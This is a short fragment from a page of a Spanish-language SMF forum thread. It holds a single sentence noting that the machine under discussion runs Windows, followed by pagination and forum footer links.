   nos damos cuenta de que estamos hablando de una maquina win*.

      
Páginas: 1 [2] 3 4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines